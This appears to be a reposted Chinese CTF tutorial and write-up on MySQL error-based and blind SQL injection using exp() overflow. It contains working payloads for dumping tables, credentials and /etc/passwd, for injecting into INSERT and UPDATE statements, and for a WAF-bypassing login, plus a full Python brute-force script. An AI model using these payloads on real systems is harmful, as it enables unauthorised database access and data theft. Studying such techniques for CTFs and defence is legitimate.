前言
前段时间做 虎符杯 CTF Finalweb Hatenum 这道题时学到了使用 MySQL exp() 函数进行注入的新姿势,这里系统的总结一下。话不多少,开搞!
MySQL exp() 函数
MySQL中的EXP()函数用于将E提升为指定数字X的幂,这里E(2.718281 ...)是自然对数的底数。
EXP(X)mysql> select exp(3);+--------------------+| exp(3) |+--------------------+| 20.085536923187668 |+--------------------+1 row in set (0.00 sec)mysql>
mysql> select exp(709);+-----------------------+| exp(709) |+-----------------------+| 8.218407461554972e307 |+-----------------------+1 row in set (0.00 sec)mysql> select exp(710);ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'mysql>
除了 exp() 之外,还有类似 pow() 之类的相似函数同样是可利用的,他们的原理相同。
使用 exp() 函数进行报错注入
-
使用版本:MySQL5.5.5 及以上版本
现在我们已经知道当传递一个大于 709 的值时,函数 exp() 就会引起一个溢出错误。那么我们在实际利用中如何让 exp() 报错的同时返回我们想要得到的数据呢?
我们可以用 ~ 运算符按位取反的方式得到一个最大值,该运算符也可以处理一个字符串,经过其处理的字符串会变成大一个很大整数足以超过 MySQL 的 Double 数组范围,从而报错输出:
mysql> select ~(select version());+----------------------+| ~(select version()) |+----------------------+| 18446744073709551610 |+----------------------+1 row in set, 1 warning (0.00 sec)mysql> select exp(~(select * from(select version())x));ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '5.5.29' from dual)))'mysql> select exp(~(select * from(select user())x));ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'mysql> select exp(~(select * from(select database())x));ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'ctf' from dual)))'mysql>
注出数据
-
得到表名
mysql> select exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())x));ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'flag,users' from dual)))'mysql>
-
得到列名
mysql> select exp(~(select*from(select group_concat(column_name) from information_schema.columns where table_name='users')x));ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'id,username,password' from dual)))'mysql>
-
检索数据:
mysql> select exp(~ (select*from(select group_concat(id, 0x7c, username, 0x7c, password) from users)x));ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '1|admin|123456,2|whoami|657260,3|bunny|864379' from dual)))'mysql>
-
读取文件(有13行的限制):
mysql> select exp(~(select * from(select load_file('/etc/passwd'))x));ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin' from dual)))'
一蹴而就
这个查询可以从当前的上下文中 dump 出所有的 tables 与 columns,我们也可以 dump 出所有的数据库,但由于我们是通过一个错误进行提取,它会返回很少的结果:
mysql> select exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x));ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000ctf::flag::idctf::flag::flagctf::users::idctf::users::usernamectf::users::password' from dual)))'mysql>
Injection in Insert
根据 Insert 位置的注入方式按部就班就好了。假设原来的插入语句如下:
insert into users(id,username,password) values(4,'john','679237');mysql> insert into users(id,username,password) values(4,'john' or exp(~(select * from(select user())x)),1);ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'mysql>
# 在username处插入: john' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)),1)#mysql> insert into users(id,username,password) values(4,'john' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)),1);#','679237');ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000ctf::flag::idctf::flag::flagctf::users::idctf::users::usernamectf::users::password' from dual)))'mysql>
Injection in Update
根据 Update 位置的注入方式按部就班就好了。假设原来的插入语句如下:
update users set password='new_value' WHERE username = 'admin';mysql> update users set password='abc' or exp(~(select * from(select user())x));ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'mysql>
使用 exp() 函数进行盲注
有的登录逻辑会根据 sql 语句的报错与否返回不同的结果,如果我们可以控制这里得报错的话便可以进行盲注。下面我们通过一个 CTF 例题来进行详细探究。
虎符杯 CTF Finalweb Hatenum
进入题目是一个登录页面:
题目给出了源码:
-
home.php
require_once('config.php');if(!$_SESSION['username']){header('location:index.php');}if($_SESSION['username']=='admin'){echo file_get_contents('/flag');}else{echo 'hello '.$_SESSION['username'];}
登录进去便能得到flag。
-
login.php
require_once('config.php');array_waf($_POST);if(isset($_POST['username'])&&isset($_POST['password'])&&isset($_POST['code'])){$User = new User();switch ($User->login($_POST['username'],$_POST['password'],$_POST['code'])) {case 'success':echo 'login success';header('location:home.php');break;case 'fail':echo 'login fail';header('location:index.php');break;case 'error':echo 'error';header('location:index.php');break;}}else{die('no use');}
-
config.php
error_reporting(0);session_start();class User{public $host = "localhost";public $user = "root";public $pass = "123456";public $database = "ctf";public $conn;function __construct(){$this->conn = new mysqli($this->host,$this->user,$this->pass,$this->database);if(mysqli_connect_errno()){die('connect error');}}function find($username){$res = $this->conn->query("select * from users where username='$username'");if($res->num_rows>0){return True;}else{return False;}}function register($username,$password,$code){if($this->conn->query("insert into users (username,password,code) values ('$username','$password','$code')")){return True;}else{return False;}}function login($username,$password,$code){$res = $this->conn->query("select * from users where username='$username' and password='$password'");if($this->conn->error){ // 如果sql语句报错就返回errorreturn 'error';}else{$content = $res->fetch_array();if($content['code']===$_POST['code']){$_SESSION['username'] = $content['username'];return 'success';}else{return 'fail';}}}}function sql_waf($str){if(preg_match('/union|select|or|and|'|"|sleep|benchmark|regexp|repeat|get_lock|count|=|>|<| |*|,|;|r|n|t|substr|right|left|mid/i', $str)){die('Hack detected');}}function num_waf($str){if(preg_match('/d{9}|0x[0-9a-f]{9}/i',$str)){die('Huge num detected');}}function array_waf($arr){foreach ($arr as $key => $value) {if(is_array($value)){array_waf($value);}else{sql_waf($value);num_waf($value);}}}
过滤的死死地,把我会的都过滤了,甚至过滤了一些我压根不会的。但还是遗漏了一些字符,比如反斜杠 、括号 () 等。
有了反斜杠 之后,我们可以在 username 中输入转义符将前面的引号转义,造成引号错误闭合,实现万能密码:
"username": "admin\","password": "||1#","code": "xxx"
但是还需要 code 才行,所以我们的思路是使用 rlike(即regexp)按照之前regexp匹配注入的方法,将 code 匹配出来。
我们又在 login 函数中注意到:
if($this->conn->error){ // 如果sql语句报错就返回errorreturn 'error';}
如果 sql 语句出现错误便返回字符串 "error",然后进入到 login.php 中就会返回 error。根据这里的特性,如果我们可以控制这里的报错的话,便可以进行盲注。
但是怎么构造呢?
在网上的看到了大佬的思路是真的巧妙:
||exp(710-(... rlike ...))即如果 (... rlike ...) 中的语句执行匹配后的结果为True,经过减号转换后为 exp(710-1) 后不会溢出;若为false,转换为 exp(710-0) 后则会溢出并报错。
大致的 payload 如下:
'username': 'admin\','password': '||exp(710-(code rlike binary {0}))#','code': '1'
% 和 ^,按照之前regexp注入的操作我们可以将 ^ 联通后面猜测的字符一块做 Hex 编码,即:def str2hex(string): # 转换16进制,16进制在数据库执行查询时又默认转换成字符串result = ''for i in string:result += hex(ord(i))result = result.replace('0x', '')return '0x' + result......passwd = str2hex('^' + name + j)payloads = payload.format(passwd).replace(' ',chr(0x0c))postdata = {'username': 'admin\','password': payloads,'code': '1'}
^ 了,也就没有办法在正则表达式中确定首位的位置,我们只能知道有这么几个连续的字符,就像下面这样:
然后首先爆破出前三位来,然后再通过前 3 位爆第4位,再通过第2、3、4位爆第5位......
编写如下脚本进行爆破:
import requestsimport stringdef str2hex(string): # 转换16进制,16进制在数据库执行查询时又默认转换成字符串result = ''for i in string:result += hex(ord(i))result = result.replace('0x', '')return '0x' + resultstrs = string.ascii_letters + string.digits + '_'url = "http://be2ae7e7-9c0e-4f21-8b3a-97e28c20d79c.node3.buuoj.cn/login.php"headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'}payload = '||exp(710-(code rlike binary {0}))#'if __name__ == "__main__":name = ''z = 3for i in range(1, 40):for j in strs:passwd = str2hex(name + j)payloads = payload.format(passwd).replace(' ',chr(0x0c))postdata = {'username': 'admin\','password': payloads,'code': '1'}r = requests.post(url, data=postdata, headers=headers, allow_redirects=False)if "fail" in r.text:name += jprint(j, end='')breakif len(name) >= 3:for i in range(1, 40):for j in strs:passwd = str2hex(name[z - 3:z] + j)payloads = payload.format(passwd).replace(' ', chr(0x0c))postdata = {'username': 'admin\','password': payloads,'code': '1'}r = requests.post(url, data=postdata, headers=headers, allow_redirects=False)if "fail" in r.text:name += jprint(j, end='')z += 1break
erghruigh2uygh2uygh2uygh2uygh2uygh2uygh2uygh2uygh2uygh2uygh......erghruigh2 之后不停地循环出现 uygh2,所以我们可以推测出真正的 code 里面有两个 gh2,其中位于前面的那个 gh2 后面紧跟着一个 u,即 gh2u。后面那个 gh2 后面跟的是那个字符我们还不能确定,那我们便可以测试一下除了 u 以外的其他字符,经测试第二个 gh2 后面跟的字符是 3,即 gh23,然后继续根据 h23 爆破接下来的字符就行了,最后得到的 code 如下:erghruigh2uygh23uiu32ig
原文始发于微信公众号(听风安全):如何使用 MySQL exp() 函数进行 Sql 注入
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论